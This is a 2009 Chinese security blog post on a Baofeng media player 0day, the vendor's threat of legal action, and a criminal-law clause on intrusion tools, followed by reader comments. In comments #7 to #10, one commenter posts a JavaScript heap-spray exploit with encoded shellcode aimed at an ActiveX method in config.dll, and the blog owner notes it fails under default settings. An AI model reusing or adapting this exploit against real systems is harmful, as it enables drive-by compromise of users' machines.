首页 > 八卦互联 > 暴风影音0day和刑法修正案

暴风影音0day和刑法修正案

2009年5月5日 baoz 阅读评论

暴风影音作为很牛X的影音播放器,一直备受安全圈的关注,最近它被人爆了个0day,接着暴风说要追究法律责任。这在刑法修正案刚出不久,是第一单,事情发展到底如何,我们密切关注。刑法修正案到底给安全圈带来怎样的变化,拭目以待。

接着看看最近暴风0day的timeline,很佩服暴风的危机公关能力。

2009.4.30 暴风影音0day exploit 被爆到milw0rm

2009.5.2 cnbeta报道:暴风影音被报告存在0day安全漏洞

2009.5.3 360响应,360安全中心就暴风影音0day漏洞提供临时解决方案, 但方式非常温柔,不得不说这个是公关与合作的结果,换成别个软件的漏洞落在360手里,这场戏不会这么平淡。

2009.5.4 瑞星响应,瑞星:暴风影音软件曝严重漏洞 大量用户沦为肉鸡,cnbeta上此文章已被公关。

2009.5.4 金山响应,金山网盾进入Beta测试 完美防御暴风0day漏洞,主要还是宣传自己的产品,没被公关。

2009.5.5 暴风发布补丁,暴风影音0day漏洞补丁

2009.5.5 暴风声称追究肇事者责任,暴风公司称软件漏洞已修复 将追究肇事者责任

下面附上相关法律条文:

提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。

包子猜您可能还喜欢下列文章:

  1. Tencent!NB!Tencent的安全团队NB!

分类: 八卦互联 标签: ,
  1. 1ian9yu
    2009年5月5日14:42 | #1
    回复 | 引用

    1.爆出来的只是漏洞信息,不是程序、工具,不算违法吧。
    2.如果这也追究责任,那大家以后谁也不敢爆漏洞了,还是留给自己使用好了,或者私底下流传挂马。暴风这种态度实在。。。

  2. heitian
    2009年5月5日15:26 | #2
    回复 | 引用

    恼羞成怒
    脑袋进水

  3. heitian
    2009年5月5日15:28 | #3
    回复 | 引用

    暴风公司确认有部分版本被黑客攻击,形成0day漏洞.

  4. void
    2009年5月5日15:51 | #4
    回复 | 引用

    为了共建和谐社会,凡是在milw0rm上发东西的人都要抓起来毙掉。

  5. acupuncture
    2009年5月5日16:24 | #5
    回复 | 引用

    很无理的BF

  6. ieraya
    2009年5月6日07:10 | #6
    回复 | 引用

    @void估计很多人都该毙掉了

  7. 3erty
    2009年5月6日14:49 | #7
    回复 | 引用

    config.dll的漏洞仍然没补
    SetAttributeValue ( ByVal lpQueryStr As String , ByVal bstrAttributeName As String , ByVal lpValueStr As String )
    第一个参数和第二个参数都有问题
    while (bstrAttributeName.length <264)
    arg2+=unescape(“%u0c0c”);

  8. 3erty
    2009年5月6日15:14 | #8
    回复 | 引用

    错了:)应该是

    while (bstrAttributeName.length <264)
    bstrAttributeName+=unescape(”%u0c0c”);

  9. baoz
    2009年5月6日23:15 | #9
    回复 | 引用

    config.dll的问题不大,safeforscript是false的

  10. 3erty
    2009年5月7日08:30 | #10
    回复 | 引用

    function test()
    {
    var shellcode = unescape(“%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063″);
    var bigblock = unescape(“%u9090%u9090″);
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace)
    bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0×40000)
    block = block+block+fillblock;
    memory = new Array();
    for (x=0; x<300; x++)
    memory[x] = block + shellcode;
    var arg2 = ”;
    while (arg2.length <264)
    arg2+=unescape(“%u0c0c”);
    var arg1=”3rty88″;
    var arg3=”3rty88″
    target.SetAttributeValue(arg1,arg2,arg3);
    }

    可用:)

  11. baoz
    2009年5月7日09:34 | #11
    回复 | 引用

    你用ie默认的安全级别,把这个js放到外面的服务器上,访问一下,看看会发生什么 :)
    应该会js报错,然后告诉你xxxx方法不可用。

  12. 3erty
    2009年5月7日13:58 | #12
    回复 | 引用

    对,的确有这个问题
    不是很了解safeforscript,可否提供些资料0_0

  13. baoz
    2009年5月7日15:10 | #13
    回复 | 引用

    你可以搜索一下 MSDN里有不少描述safe for script和safe for init的的资料。

  14. 3erty
    2009年5月7日15:48 | #14
    回复 | 引用

    好,多谢指导

  15. baoz
    2009年5月7日22:35 | #15
    回复 | 引用

    指导不敢当,互相学习 :)

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
What is 9 + 8 ?
Please leave these two fields as-is:
请回答一个简单的问题避免垃圾评论